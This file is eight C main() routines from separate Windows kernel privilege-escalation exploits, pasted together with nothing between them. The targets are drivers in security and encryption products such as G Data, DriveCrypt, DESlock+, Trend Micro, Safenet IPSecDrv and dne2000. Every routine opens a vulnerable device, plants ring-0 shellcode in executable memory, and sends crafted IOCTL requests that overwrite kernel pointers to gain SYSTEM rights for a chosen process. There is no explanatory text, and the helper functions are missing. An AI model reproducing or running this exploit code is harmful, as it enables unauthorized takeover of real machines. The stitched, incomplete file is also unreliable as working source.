int main(int argc, char **argv)
{
HANDLE hDevice, hThread;
char *inbuff, *inbuffer;
DWORD *buff;
DWORD ioctl = 0x83170180, in = 0xC, out = 0x0C, len, zlen, ppid;
LPVOID zpage, zbuf;
printf ("G Data TotalCare 2011 0day Local Kernel Exploit\n"
"by: Nikita Tarakanov (CISS Research Team)\n");
if (argc <= 1)
{
printf("Usage: %s <processid to elevate>\n", argv[0]);
return 0;
}
ppid = atoi(argv[1]);
zpage = VirtualAlloc(NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
printf("VirtualAlloc failed\n");
return 0;
}
printf("Ring 0 shellcode at 0x%08X address\n", zpage, 0x10000);
memset(zpage, 0xCC, 0x1000);
zbuf = fixup_ring0_shell(ppid, &zlen);
memcpy((PCHAR)zpage, (PCHAR)zbuf, zlen);
memcpy((PCHAR)zpage + zlen, (PCHAR)freeze, sizeof (freeze) - 1);
if ( (hDevice = CreateFileA("\\\\.\\MiniIcptControlDevice0",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
inbuff = (char *)malloc(0x1000);
memset(inbuff, 0x90, 0x1000);
buff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
inbuffer = inbuff + 0x40;
printf("crafting\n");
craft_fake_flt_context(inbuffer, zpage);
printf("deviceio!\n");
buff[0] = inbuffer;
DeviceIoControl(hDevice, ioctl, buff, in, buff, out, &len, NULL);
free(inbuff);
return 0;
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
CHAR buf[1024], buf1[8], buf2[0x88+1];
DWORD rlen, zlen, ppid;
LPVOID zpage, zbuf, base;
HANDLE hFile;
BOOL result;
printf ("DriveCrypt <= 5.3 local kernel ring0 SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DCR", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
memset (&req, 0, sizeof req);
req.action = 0x153;
req.flag = 0;
req.ptr = buf;
printf ("* enabling driver...\n");
result = DeviceIoControl (hFile, DCR_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("** version: 0x%08X [%s], %s\n", *(int *) &buf[8], &buf[12], &buf[19]);
printf ("* done\n");
zpage = VirtualAlloc ((LPVOID) 0x610000, 0x10000,
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
base = get_module_base ();
if (base == NULL)
{
fprintf (stderr, "* unable to find DCR.sys base\n");
exit (EXIT_FAILURE);
}
printf ("* DCR.sys base: 0x%08X\n", base);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy ((LPVOID) zpage + 0x61, win32_fixup, sizeof (win32_fixup) - 1);
memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) - 1), zbuf, zlen);
memcpy ((LPVOID) (zpage + 0x61 + sizeof (win32_fixup) + zlen - 1),
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.action = 79;
req.flag = 0;
memset (buf1, 0x41, sizeof buf1);
buf1[sizeof buf1 - 1] = 0;
req.arg1 = buf1;
memset (buf2, 0x61, sizeof buf2);
buf2[sizeof buf2 - 1] = 0;
req.arg2 = buf2;
req.ptr = buf;
printf ("* hitting.. ");
fflush (stdout);
result = DeviceIoControl (hFile, DCR_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int
main (int argc, char **argv)
{
struct ioctl_req_enable req_enable;
struct ioctl_req req;
struct ioctl_ptr ptr;
struct ioctl_pid pid;
struct ioctl_func func;
LPVOID c_addr, zpage, zbuf;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL bResult;
printf ("DESlock+ 4.0.2 local kernel SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DLPCryptCore", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);
memset (&req_enable, 0, sizeof req_enable);
req_enable.flag[0] = DLPCRYPT_FLAG1;
req_enable.flag[1] = DLPCRYPT_FLAG2;
req_enable.len = sizeof req_enable;
printf ("* verifying context... ");
bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ENABLED,
&req_enable, sizeof req_enable,
&req_enable, sizeof req_enable, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("result: %d, enabled: %d\n", req_enable.result, req_enable.enabled);
printf ("* adding pid [%d]... ", GetCurrentProcessId ());
bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_ADD,
&req_enable, sizeof req_enable,
&req_enable, sizeof req_enable, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n");
memset (&req, 0, sizeof req);
req.flag[0] = DLPCRYPT_FLAG1;
req.flag[1] = DLPCRYPT_FLAG2;
req.len = sizeof req;
req.action = 2;
req.ptr = &ptr;
memset (&ptr, 0, sizeof ptr);
ptr.ppid = &pid;
ptr.action = 2;
ptr.func = &func;
memset (&pid, 0, sizeof pid);
pid.pid = GetCurrentProcessId ();
memset (&func, 0, sizeof func);
func.func_ptr = &c_addr;
c_addr = (LPVOID) zpage;
printf ("* req.ptr: 0x%08X\n", &ptr);
printf ("* @0x%08X: ppid_ptr: 0x%08X, func_ptr: 0x%08X\n",
&ptr, ptr.ppid, ptr.func);
printf ("* @0x%08X: func_ptr: 0x%08X\n", ptr.func, func.func_ptr);
printf ("* @0x%08X: func_ptr: 0x%08X\n", &c_addr, c_addr);
/* jump to our address :) */
printf ("* jumping.. ");
bResult = DeviceIoControl (hFile, DLPCRYPT_IOCTL_PROCESS,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
DWORD disk_no, i, rlen, zlen, ppid;
CHAR rbuf[64], sbuf[512];
LPVOID zpage, zbuf, base;
HANDLE hFile;
BOOL result;
printf ("DESlock+ <= 3.2.6 local kernel ring0 SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
for (i = 0; i < DLKFDISK_DISK_MAX; i++)
{
memset (&req, 0, sizeof req);
req.arg[0] = (void *) 0xDEADBEEF;
req.arg[1] = (void *) 0xDEADBEEF;
req.arg[2] = (void *) 0xDEADBEEF;
req.arg[3] = (void *) i; /* drive number */
req.arg[4] = (void *) sizeof sbuf; /* buffer size */
req.arg[5] = (void *) sbuf; /* buffer pointer */
result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
&req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
if (strlen (sbuf + DLKFDISK_OFFSET - 1) > 6 &&
strcmp (sbuf + DLKFDISK_OFFSET - 1 + 6, ":\\XXXAAAA.mnt") == 0)
{
disk_no = i;
break;
}
}
printf ("* write buf: \"%s\"\n", &sbuf[DLKFDISK_OFFSET - 1]);
zpage = VirtualAlloc ((LPVOID) 0x41410000, 0x10000,
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
base = get_module_base ();
if (base == NULL)
{
fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
exit (EXIT_FAILURE);
}
printf ("* dlkfdisk.sys base: 0x%08X\n", base);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy ((LPVOID) 0x41414141, win32_fixup, sizeof (win32_fixup) - 1);
memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) - 1), zbuf, zlen);
memcpy ((LPVOID) (0x41414141 + sizeof (win32_fixup) + zlen - 1),
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.arg[0] = (void *) 0xDEADBEEF;
req.arg[1] = (void *) 0xDEADBEEF;
req.arg[2] = (void *) 0xDEADBEEF;
req.arg[3] = (void *) disk_no; /* drive number */
req.arg[4] = (void *) 512; /* buffer size */
req.arg[5] = (void *) (base + DLKFDISK_SLOT - DLKFDISK_OFFSET); /* buffer pointer */
printf ("* overwriting [@0x%08X %d-bytes].. ",
base + DLKFDISK_SLOT, strlen (sbuf + DLKFDISK_OFFSET - 1) + 1);
result = DeviceIoControl (hFile, DLKFDISK_IOCTL,
&req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
if (!result)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n");
/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
&req, sizeof req, rbuf, sizeof rbuf, &rlen, 0);
if (!result)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int main(int argc, char **argv)
{
HANDLE hDevice, hThread;
DWORD *inbuff;
DWORD ioctl = 0x220404, in = 0x10, out = 0x0C, len, zlen, ppid;
LPVOID zpage, zbuf;
struct sockaddr_in service;
// Initialize Winsock
WSADATA wsaData;
SOCKET ListenSocket;
int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);
printf ("Trend Micro Titanium Maximum Security 2011 0day Local Kernel Exploit\n"
"by: Nikita Tarakanov (CISS Research Team)\n");
if (iResult != NO_ERROR) printf("Error at WSAStartup()\n");
if (argc <= 1)
{
printf("Usage: %s <processid to elevate>\n", argv[0]);
return 0;
}
ppid = atoi(argv[1]);
zpage = VirtualAlloc(NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
printf("VirtualAlloc failed\n");
return 0;
}
printf("Ring 0 shellcode at 0x%08X address\n", zpage, 0x10000);
memset(zpage, 0xCC, 0x1000);
zbuf = fixup_ring0_shell(ppid, &zlen);
memcpy((PCHAR)zpage, (PCHAR)zbuf, zlen);
memcpy((PCHAR)zpage + zlen, (PCHAR)freeze, sizeof (freeze) - 1);
if ( (hDevice = CreateFileA("\\\\.\\tmtdi",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL) ) != INVALID_HANDLE_VALUE )
{
printf("Device succesfully opened!\n");
}
else
{
printf("Error: Error opening device \n");
return 0;
}
inbuff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
*inbuff = zpage;
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff, in, (LPVOID)inbuff, out, &len, NULL);
free(inbuff);
hThread = CreateThread(NULL, 0, ResetPointer, hDevice, 0, NULL);
if(!hThread){
printf("CreateThread failed!\n");
}
ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (ListenSocket == INVALID_SOCKET) {
printf("Error at socket: %ld\n", WSAGetLastError());
WSACleanup();
return 0 ;
}
service.sin_family = AF_INET;
service.sin_addr.s_addr = inet_addr("127.0.0.1");
service.sin_port = htons(27015);
// Jump to shellcode
if (bind( ListenSocket, (SOCKADDR*) &service, sizeof(service)) == SOCKET_ERROR) {
printf("bind failed!\n");
closesocket(ListenSocket);
return 0 ;
}
WSACleanup();
return 0;
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
LPVOID c_addr, p_addr;
LPVOID zpage, zbuf, base, pbase;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;
printf ("Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 SYSTEM
exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\IPSecDrv", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
c_addr = zpage;
base = get_module_base ();
p_addr = (LPVOID) ((DWORD) ((LPVOID) &c_addr - (base + 0x1C604)) /
16);
printf ("* base: 0x%08X, p: 0x%08X\n", base + 0x1C604, &c_addr);
printf ("* call distance: 0x%08X\n", p_addr);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.arg[0] = p_addr;
/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, IPSECDRV_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen,
0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
struct ioctl_item items[2];
struct ioctl_func funcs;
LPVOID zpage, zbuf;
DWORD rlen, zlen, ppid;
HANDLE hFile;
BOOL result;
printf ("Deterministic Network Enhancer (dne2000.sys) local kernel ring0 SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DNE", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc (NULL, 0x10000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x10000);
memset (zpage, 0xCC, 0x10000);
zbuf = fixup_ring0_shell (ppid, &zlen);
memcpy (zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy (zpage + sizeof (win32_fixup) - 1, zbuf, zlen);
memcpy (zpage + sizeof (win32_fixup) + zlen - 1,
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.req_num = DNE_FLAG;
req.ptr[0] = NULL;
req.ptr[1] = &items[0];
memset (items, 0, sizeof items);
items[0].flag = ITEM_FLAG_1;
items[0].item_ptr = &items[1];
items[1].flag = ITEM_FLAG_2;
items[1].item_func = &funcs;
memset (&funcs, 0, sizeof funcs);
funcs.flag = FUNC_FLAG;
funcs.func_ptr = zpage;
printf ("* req.ptr: 0x%08X\n", &items[0]);
printf ("* @0x%08X: flag: 0x%08X, item_ptr: 0x%08X\n",
&items[0], items[0].flag, items[0].item_ptr);
printf ("* @0x%08X: flag: 0x%08X, item_func: 0x%08X\n",
items[0].item_ptr, items[1].flag, items[1].item_func);
printf ("* @0x%08X: flag: 0x%08X, func_ptr: 0x%08X\n",
items[1].item_func, funcs.flag, funcs.func_ptr);
/* jump to our address :) */
printf ("* jumping.. ");
result = DeviceIoControl (hFile, DNE_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!result)
{
fprintf (stderr, "* DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
DWORD dResult, rlen, zpage_len, zlen, ppid;
LPVOID zpage, zbuf, base;
CHAR rbuf[64];
HANDLE hFile;
BOOL bResult;
printf ("DESlock+ <= 3.2.6 local kernel ring0 link list zero SYSTEM exploit\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <processid to elevate>\n", argv[0]);
exit (EXIT_SUCCESS);
}
ppid = atoi (argv[1]);
hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage_len = 0x7FFF;
zpage = (LPVOID) 0x00000001;
dResult = NtAllocateVirtualMemory ((HANDLE) -1, &zpage, 0, &zpage_len,
MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE);
if (dResult != STATUS_SUCCESS)
{
fprintf (stderr, "* NtAllocateVirtualMemory failed\n");
exit (EXIT_FAILURE);
}
printf ("* allocated page: 0x%08X [%d-bytes]\n",
zpage, 0x7FFF);
base = get_module_base ();
if (base == NULL)
{
fprintf (stderr, "* unable to find dlkfdisk.sys base\n");
exit (EXIT_FAILURE);
}
printf ("* dlkfdisk.sys base: 0x%08X\n", base);
memset (zpage, 0xCC, 0x7FFF);
zbuf = fixup_ring0_shell (base, ppid, &zlen);
memcpy ((LPVOID) zpage, win32_fixup, sizeof (win32_fixup) - 1);
memcpy ((LPVOID) (zpage + sizeof (win32_fixup) - 1), zbuf, zlen);
memcpy ((LPVOID) (zpage + sizeof (win32_fixup) + zlen - 1),
win32_ret, sizeof (win32_ret) - 1);
memset (&req, 0, sizeof req);
req.arg[0] = (void *) DLMFENC_FLAG;
req.arg[1] = (void *) 0x12;
req.arg[2] = (void *) (base + DLKFDISK_SLOT); /* overwrite pointer */
printf ("* overwriting [@0x%08X %d-bytes].. ",
base + DLKFDISK_SLOT, 16);
xor_mask_req (&req);
bResult = DeviceIoControl (hFile, DLMFENC_IOCTL,
&req, sizeof req, &req, sizeof req, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n");
CloseHandle (hFile);
hFile = CreateFileA ("\\\\.\\DLKFDisk_Control", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
/* jump to our address :) */
printf ("* jumping.. ");
bResult = DeviceIoControl (hFile, DLKFDISK_R_IOCTL,
&rbuf, sizeof rbuf, &rbuf, sizeof rbuf, &rlen, 0);
if (!bResult)
{
fprintf (stderr, "DeviceIoControl failed\n");
exit (EXIT_FAILURE);
}
printf ("done\n\n"
"* hmmm, you didn't STOP the box?!?!\n");
CloseHandle (hFile);
return (EXIT_SUCCESS);
}